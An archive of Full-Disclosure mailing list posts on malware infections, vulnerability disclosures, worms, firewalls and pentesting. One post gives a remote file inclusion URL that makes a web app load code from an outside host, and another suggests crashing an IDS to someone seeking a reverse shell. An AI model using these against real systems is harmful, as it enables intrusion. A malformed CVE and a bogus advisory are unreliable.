Secunia - http://secunia.com/
[Full-disclosure] Forensics help - Outgoing email
Hello, I have a Windows 2000 Professional as my primary workstation. I have pretty much all sorts of assorted programs and applications on this Windows system. The Anti-Virus software on my system is the free version of AVG from Grisoft. Recently, I was introduced to the torrent network (primarily because I wanted to download some Linux distros). My curiosity made me download other audio torrents to see the efficiency of the torrent network. One thing I have noticed on my system is that there is an email being sent out periodically to some system (247.16.delicado.com.uy). When the email is being sent out, the AVG Anti Virus is scanning the email, which is how I found out about the delicado.com.uy system. I do not know what is being sent out. Can the torrent files compromise security on your system? Has my system been compromised and become part of a bot network? How do I find out what is causing this email to go out? How do I fix this problem? Any help is much appreciated. Thank you in advance. Regards, Subba Rao ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ADVISORY] | x Thu Mar 16 21:06:20 EST 2006 x | Buffer Overflow in Microsoft PowerPoint
[ADVISORY] | x Thu Mar 16 21:06:20 EST 2006 x | Buffer Overflow in Microsoft PowerPoint +++ o/ å Background There is no background commentary about the problem indentified. +++ å \o Workaround There was no identified workarounds. +++ o/ å CVE Information The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2006-282768 to this issue +++ Contact DanB-FD [EMAIL PROTECTED] CISSP GSAE CCE CEH CSFA SSP-CNSA GIPS GWAS CAP SSCP ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] New site with 0day xploits
Fortinet Research wrote: i found some new unpatched xploits here: http://djloci.gnationnid.com/?xx SPAMMER. This is a retail link, don't bother visiting it! No 0day here! DanBUK ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] ashnews Cross-Site Scripting Vulnerability
Hi, Dan B UK wrote: Due to the nature of the issue I am not disclosing the detail of it until the writer of the software has updated it; maybe you could have waited?? A vulnerability that allows privileges of the apache user within the limitations of how much PHP has been locked down. Since the author of the product has got back to me with the following I think it is ok to disclose the issue now. That is a known error. Unfortunately I have completely abondoned ashnews. In fact, I have been neglecting taking it down completely which I am going to do right now. - Derek The issue is in the handling of the $pathtoashnews, it is not validated before being used by the script. Allowing remote or local file inclusion. eg: http://dosko.nl/news/ashnews.php?pathtoashnews=http://f-box.org/~dan/inc.inc? ( The ? is required to make the remote server (f-box.org) ignore the string that is appended to the variable $pathtoashnews ) ( The website that is in the example above has already been defaced! ) Cheers, DanB UK. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] ashnews Cross-Site Scripting Vulnerability
Hi, George A. Theall wrote: Is this different from what Phil Dunn reported 2.5 years ago? http://www.securityfocus.com/archive/1/329910 Indeed this is no different. My apologies; I didn't do any searching beforehand. I made an assumption! My mistake! Cheers, Dan. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Rogue Network Link Detection
Hi, H D Moore wrote: I found an old document and some crappy perl code on my system, figured someone might find it interesting: I wouldn't say crappy. Indeed this is quite a handy little tool. I quickly discovered that I can now spoof traffic using our 3rd parties Data Center servers for approx 15 different IPs. (I also discovered that ALL of our VoIP phones can be used as a gateway out... Not necessararly for spoofing but to circumvent firewall rules in place for the Data subnets...) Also allows me to double check that the changes they made to our managed firewalls are in effect at each site. Cheers, DanBUK ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Third issue of the Zone-H Comics
On Tue, 27 Sep 2005, str0ke wrote: If we were to say zone-h sucks then we would also state that attrition does since they did the exact thing. (which attrition doesn't suck). Just in case anyone else needed to do the same. str0ke, which did you mean? [dictionary.com] attrition Audio pronunciation of attrition ( P ) Pronunciation Key (uh-trshn)n. 1. A rubbing away or wearing down by friction. 2. A gradual diminution in number or strength because of constant stress. 3. A gradual, natural reduction in membership or personnel, as through retirement, resignation, or death. 4. Repentance for sin motivated by fear of punishment rather than by love of God. /str0ke On 9/27/05, Richard Horsman [EMAIL PROTECTED] wrote: n3td3v, I would compare zone-h more to a newspaper than a terrorists site. Newspapers report what is happening in the world whether it's good news or bad news. Zone-h brings news about defacements and other security related issues, it does not encourage defacements. Richh -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of n3td3v Sent: 27 September 2005 17:10 To: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Third issue of the Zone-H Comics Hi, I have reviewed your site and it sucks. Looks like you're trying to encourage the activity of webpage defacement and bringing celebrity status to those who can deface/ submit the most defacements. You make it look legal by saying the site is useful for research, but really, we all know it encourages the malicious kids who submit to the site. I don't know why the security services in the U.S haven't closed you down. Your site is in comparison to asking terrorist bombers to post suicide bombing videos to a website and asking you to look at it. The only difference here is, Zone-H is about cyber terrorism, rather than terrorism in the real world. Do the U.S security services take cyber terrorism as seriously as real world terrorism? And if they do, Why is Zone-H still online? A journalist should ask that question at Bush's next news conference. Also: Are Zone-H admins about to expand the website to allow for suicide bombing video's, or is that different from the cyber terrorism that your site currently supports. And if you don't support cyber terrorism, then why is Zone-H online and why are you an admin of Zone-H.org Thats all for now, Thanks, n3td3v On 9/27/05, Gerardo 'Astharot' Di Giacomo [EMAIL PROTECTED] wrote: Hello, http://www.zone-h.org Gerardo 'Astharot' Di Giacomo - Zone-H Admin ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ** NEW: Sec-1 Hacking Training - Learn to breach network security to further your knowledge and protect your network http://www.sec-1.com/applied_hacking_course.html ** ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Eric Wheeler Vice President National Security Concepts, Inc. PO Box 3567 Tualatin, OR 97062 http://www.nsci.us/ Voice: (503) 293-7656 Fax: (503) 885-0770 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Re: Re: in-line coax monitoring device
On Tue, 27 Sep 2005, Dave Korn wrote: Dave Korn [EMAIL PROTECTED] wrote: From: Alex Krycek ?? ?...looking for an in-line coax monitoring device that will give me the ability to monitor/capture and decode all traffic The device you are looking for does exist. It's called a cable modem. Even simpler: it's the T-shaped BNC coax adapter you use to connect a PC to the coax network. No it isn't. Do you really think it's possible to broadcast two hundred channels of video plus supply broadband IP access to a couple of hundred people over a single 10Mb/s 10-BASE-T ethernet line of the kind that has been obsolete for the best part of a decade? Yeah, that and BNC is much different than RG58 ... That's not an ethernet on that wire. cheers, DaveK -- Eric Wheeler Vice President National Security Concepts, Inc. PO Box 3567 Tualatin, OR 97062 http://www.nsci.us/ Voice: (503) 293-7656 Fax: (503) 885-0770 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] CORE-Impact license bypass
On Tue, 27 Sep 2005, Bernhard Mueller wrote: Exibar wrote: I didn't mean to imply that the consultants create their own exploits, not many I know could even begin to do that, only a couple are talented enough to do just that. Even for those very few, it's just not feasable from a time perspective. Much quick and cost effective to use what's out there. so what use is a pentest if the consultant isn't even talented enough to find / create exploits for unknown vulnerabilities? any average admin can install and run an automatic security scanner. furthermore, a common nessus report contains 99% useless garbage. and most of the time, you can not apply generic exploits like these from metasploit to a specific customer situation. It should also be noted that many security flaws in Customer networks are in design and therefore implementation. The real issue comes down to client-side security. Most pentests are are trivial after an attack from Eve, even if the first person she emails in the organization sees through it ... X-From: Eve From: Bob Hi Alice! Can you get me a quote for the parts we need in the attached spreadsheet? Thank you! -Bob Attachment:parts.xls.exe --Eric ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] Search Results w/Trojan?
On Fri, 16 Sep 2005, 'FoR ReaLz' E. Balansay wrote: On Fri, 16 Sep 2005, Madison, Marc wrote: What Trojan does McAfee report? Exploit-URLSpoof.gen See the %00? That is probably wat mcafee calls a Exploit-URLSpoof.gen. I would hardly call it a trojan ... still, it is interesting to see this show up in a googling. [EMAIL PROTECTED]/zforen/sec/m/sec-112130-8756.html -Eric McAfee link: http://vil.nai.com/vil/content/v_100927.htm Goodbye! Edgardo ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Eric Wheeler Vice President National Security Concepts, Inc. PO Box 3567 Tualatin, OR 97062 http://www.nsci.us/ Voice: (503) 293-7656 Fax: (503) 885-0770 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Re: Full-Disclosure Digest, Vol 7, Issue 25
On Wed, 14 Sep 2005, Peer Janssen wrote: I never found information about the following recurrent question of mine either: If a plug in an USB storage device, it has a /dev/sg... assigned to it. But which one? I need to know this mapping in order to mount it. I always deduce this device's name from the syslog, which works but is a bit of a PITA, so I always wondered if there is no other way to get this info, namely something like lsusb. lsusb, which would be the logical place to look for it, doesn't give away this info, at least not in an easily recognizable form (e.g. I never figured it out). sg_scan and such didn't do the trick for me either, although I might have missed something here. Write your own lssd? echo 'dmesg | grep sd[abcdefg]' /bin/lssd ; chmod 755 /bin/lssg -- Eric Wheeler Vice President National Security Concepts, Inc. PO Box 3567 Tualatin, OR 97062 http://www.nsci.us/ Voice: (503) 293-7656 Fax: (503) 885-0770 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Exploiting an online store
On Wed, 14 Sep 2005, Josh perrymon wrote: I was reading an article about an attacker that could have changed a price in an online shopping cart- Snip Next, Reshef performed a little number he calls ``electronic shoplifting'': He edited the site's online order form to reduce the price of a book from $22.95 to $2.95. Had he gone a few steps farther, Reshef actually could have purchased the book for the reduced price, adding a whole new spin to Priceline.com's ``name-your-own-price'' marketing campaign. Reshef's exploits didn't require any sophisticated software or particularly detailed knowledge of computer code. ``The only thing you need is an HTML editor that comes bundled with your Netscape or Internet Explorer browser,'' he said. ``There is no magic to this.'' --- There is no client side security. Period. Who wrote the shopping cart and allowed posting the price to it?? Wow ... -- Eric Wheeler Vice President National Security Concepts, Inc. PO Box 3567 Tualatin, OR 97062 http://www.nsci.us/ Voice: (503) 293-7656 Fax: (503) 885-0770 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] NUL Character Evasion
On Thu, 15 Sep 2005, Williams, James K wrote: List: full-disclosure Subject:[Full-disclosure] NUL Character Evasion From: ju () heisec ! de Date: 2005-09-13 21:24:42 Thank you for the report. Computer Associates is currently investigating the issue (as it relates to CA products). Regards, kw Ken Williams ; Dir. Vuln Research Computer Associates ; 0xE2941985 Wow - that was fast. Perhaps we will start using CA for their response time! Ken, How long until this update hits your product? -Eric -- Eric Wheeler Vice President National Security Concepts, Inc. PO Box 3567 Tualatin, OR 97062 http://www.nsci.us/ Voice: (503) 293-7656 Fax: (503) 885-0770 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Who wrote Maximum Security?
On Sat, 3 Sep 2005, Pablo Fernandez wrote: Did you really like that book It is great background, though some of the tools he suggests are now dated. A good cover-to-cover read and allows you to think in terms of breaking existing security. I do suggest it. -Eric -- Eric Wheeler Vice President National Security Concepts, Inc. PO Box 3567 Tualatin, OR 97062 http://www.nsci.us/ Voice: (503) 293-7656 Fax: (503) 885-0770 El dom, 04-09-2005 a las 02:16 +0530, Joshua Russel escribió: Hi List, I read Maximum Security many years ago, when it was still rated a moderately good book on hacking as there weren't many books in the market. But this question nags me all the time. Who really wrote Maximum Security? Who is the Anonymous guy? I think, it's not much of an issue to reveal the identity now as hacking is not much of a derogatory term and many people use it freely. -- Joshua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] No one else seeing the new MS05-039 worm yet?
On Mon, 29 Aug 2005, Vic Vandal wrote: I guess one can call it the Katrina worm until something better comes along. [...] - Sticks a long line of hosts resolving to broadcast address in: C:\WINNT\System32\Drivers\etc in hosts file. Do we still have huge smurf networks in the wild or has that pretty much been resolved? A well coordinated smurf from a bunch of hosts as feeding points could make a spectacular DoS. -- Eric Wheeler Vice President National Security Concepts, Inc. PO Box 3567 Tualatin, OR 97062 http://www.nsci.us/ Voice: (503) 293-7656 Fax: (503) 885-0770 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] RE: Example firewall script
On Tue, 30 Aug 2005, Rachael Treu Gomes wrote: There are also issues of what KIND of ACL to use and where to place them; Inbound or Outbound. In terms of the original question, the only difference between a good line item or a bad line item is whether or not the syntax is correct. Nicely put. The only difference between a good ACL and a bad ACL is whether or not it's structure is properly designed and whether or not it's placed in the proper location. Again, nicely put. I might also suggest adding the idea that ACL logic and format follow with the same requirements for placement, and that overarching rules/guidelines regarding their structure and flow be evaluated on a case-by-case basis. It is incomplete and rife with exception, unfortunately, to decree that all ACLs and firewall feature sets be constructed in a particular manner without taking into account the particulars surrounding their respective deployments. Can anyone suggest a book which discusses ACL theories in different points of view and practical (?existing) applications? I would love to see documentation which addresses security and manageability as it relating to things like minimal ACL-line duplication and ingress+egress filtering techniques. Even in Cisco and 5xx-level networking courses, these issues are barely touched on. For traffic policies, much has been learned from this list and from practical experience. -Eric -- Eric Wheeler Vice President National Security Concepts, Inc. PO Box 3567 Tualatin, OR 97062 http://www.nsci.us/ Voice: (503) 293-7656 Fax: (503) 885-0770 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] RE: Example firewall script (iptables)
On Wed, 31 Aug 2005, Aditya Deshmukh wrote: -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Bernardo Mart?n Sent: Tuesday, August 30, 2005 1:11 PM To: Full Disclosure Subject: RE: [Full-disclosure] RE: Example firewall script (iptables) In my first email i requested about bad example firewall script, in later mail i said that this script was to learn more so the scene isn't important because i'm loking for bad script in any scene If you are going to learn go to the Linux documentation project Website. There is a how-to Linux-firewalls that is a pretty good document Also there are some other documents breaking out of firewall The firewall piercing howto is a good read in concept here as well: http://www.ibiblio.org/pub/Linux/docs/HOWTO/other-formats/html_single/Firewall-Piercing.html Its a good lesson in covert channels :) -- Eric Wheeler Vice President National Security Concepts, Inc. PO Box 3567 Tualatin, OR 97062 http://www.nsci.us/ Voice: (503) 293-7656 Fax: (503) 885-0770 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Re: The Wireless Networking Excuse
On Mon, 29 Aug 2005, womber wrote: On 8/29/05, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: Has anyone examined the idea of using a public hotspot on a local network to shield BSA, RIAA, MPAA lawsuits? Since the tracking stops at the public facing IP, who is to say it wasn't some freeloader downloading the warez? Just looking for some feedback on this one... It is an interesting point. I have thought about it myself in the context of having my personal access point open to the public and if someone hopped on and downloaded something. Would I be resposible if they tracked it back to my AP? I am not a legal expert by any means but I would think it would be comparable to someone using my phone to make a harasing call. Although I am not sure how that would be ruled either. I am not an attorney and this is not legal advice -- I have heard that there is case law supporting that unsecured wireless communication are public domain, just as wireless telephone conversations are not considered privileged by the Court. If this is the case, then anyone with default wireless router settings are a legal public hotspot. If there is an attorney on this list I would love to read the actual opinion of this (these) alleged case(s). Currently, this information must be considered hearsay. In the Portland area we have so many WAPs which are open that all we need to do is create wireless-bridging/routing points to route packets between overlapping wireless networks. In many cases, this wireless MAN would be faster point-to-point than going out the Internet and back to its destination. Since this MAN would be behind routers for the most part, bring your own firewall ;) -- Does anyone know of decent (cheap) low-power microcontrollers having 802.11 with I/O 5Mbit which support Linux? -Eric -- Eric Wheeler Vice President National Security Concepts, Inc. PO Box 3567 Tualatin, OR 97062 http://www.nsci.us/ Voice: (503) 293-7656 Fax: (503) 885-0770 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: It's not that simple... [Was: Re: [Full-disclosure] Disney Down?]
On Wed, 17 Aug 2005, Ron DuFresne wrote: Perhaps it does realte considering the above and considering that the unix world learned many of the evils of RCP services over ten years ago that seem to hit the M$ realm every few months, repeatedly... We used to call them rsploits when it was common in unix. Friends and I had a good chuckle when MS started repeating history, having rsploits of its own. I would love to deny all port 445 with layer-3 switches but this would be like blocking portmap and expecting NFS to still mount. What have we learned from the past that we can apply to our MS networks, since they have become a (un)necessary evil? How neutered does an MS workstation become if the RPC port is completely blocked from the outside? Perhaps mostly harmless ? What would it take to write an RPC filter to only accept RPCs which we actually care about? In addition, why is PnP even an RPC accessible from the outside (no, upnp is not a good reason)!? Most importantly, we need to eliminate the entire RPC attack vector in the future for Microsoft systems -- this is not the first MS rsploit and we will certainly see more. Your thoughts? -Eric ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] Disney Down?
On Tue, 16 Aug 2005 [EMAIL PROTECTED] wrote: http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=WORM_RBOT.CBQ Symantec: Win32.Zotob.E McAfee: exploit-dcomrpc Kaspersky: Net-Worm.Win32.Small.d The IRC server this worm uses is 72.20.27.115, #tbp -- does anyone know what port? Is the host down from the virus's DoS of the IRC server? -- Eric Wheeler Vice President National Security Concepts, Inc. PO Box 3567 Tualatin, OR 97062 http://www.nsci.us/ Voice: (503) 293-7656 Fax: (503) 885-0770 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Disney Down?
On Thu, 18 Aug 2005, pingywon wrote: Disney world CLOSED ! ..it cant be ..blame it on the terrorists and save face Mickey It must be 'cause of the hand-geometry biometric scanners they are using... someone must not have liked giving up their metrics ;) -- Eric Wheeler Vice President National Security Concepts, Inc. PO Box 3567 Tualatin, OR 97062 http://www.nsci.us/ Voice: (503) 293-7656 Fax: (503) 885-0770 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Insecure http pages referencing https form-actions.
On Wed, 10 Aug 2005, Leandro Meiners wrote: There was a lnnng discussion about this at [EMAIL PROTECTED] mailing list, check out the first mail at the archives at http://www.securityfocus.com/archive/107/402824/30/390/threaded There is even a Hall of shame at http://AmirHerzberg.com/shame.html. Wow... The hall of shame is great for a laugh. -- Thanks Leandro! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] IDS or IPS detection and bypass
On Mon, 8 Aug 2005, Ahmad N wrote: I was trying to gain a reverse shell to a website the other day using a buffer overflow exploit, unfortunaetly it seems like they have some kind of buffer overflow exploit protection coming from and IDS or IPS so is there a way to find out what exactly is running, an IDS or IPS, and accordingly is there a way to bypass these systems If the IDS uses pcap (tcpdump et al) then you might find a way to crash the IDS. It seems that new IDS-crashing spoits come up often enough that perhaps your customer isn't completely up to date. Linuxsecurity.com has a decent article on testing IDS systems here: http://www.linuxsecurity.com/content/view/114356/65/. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/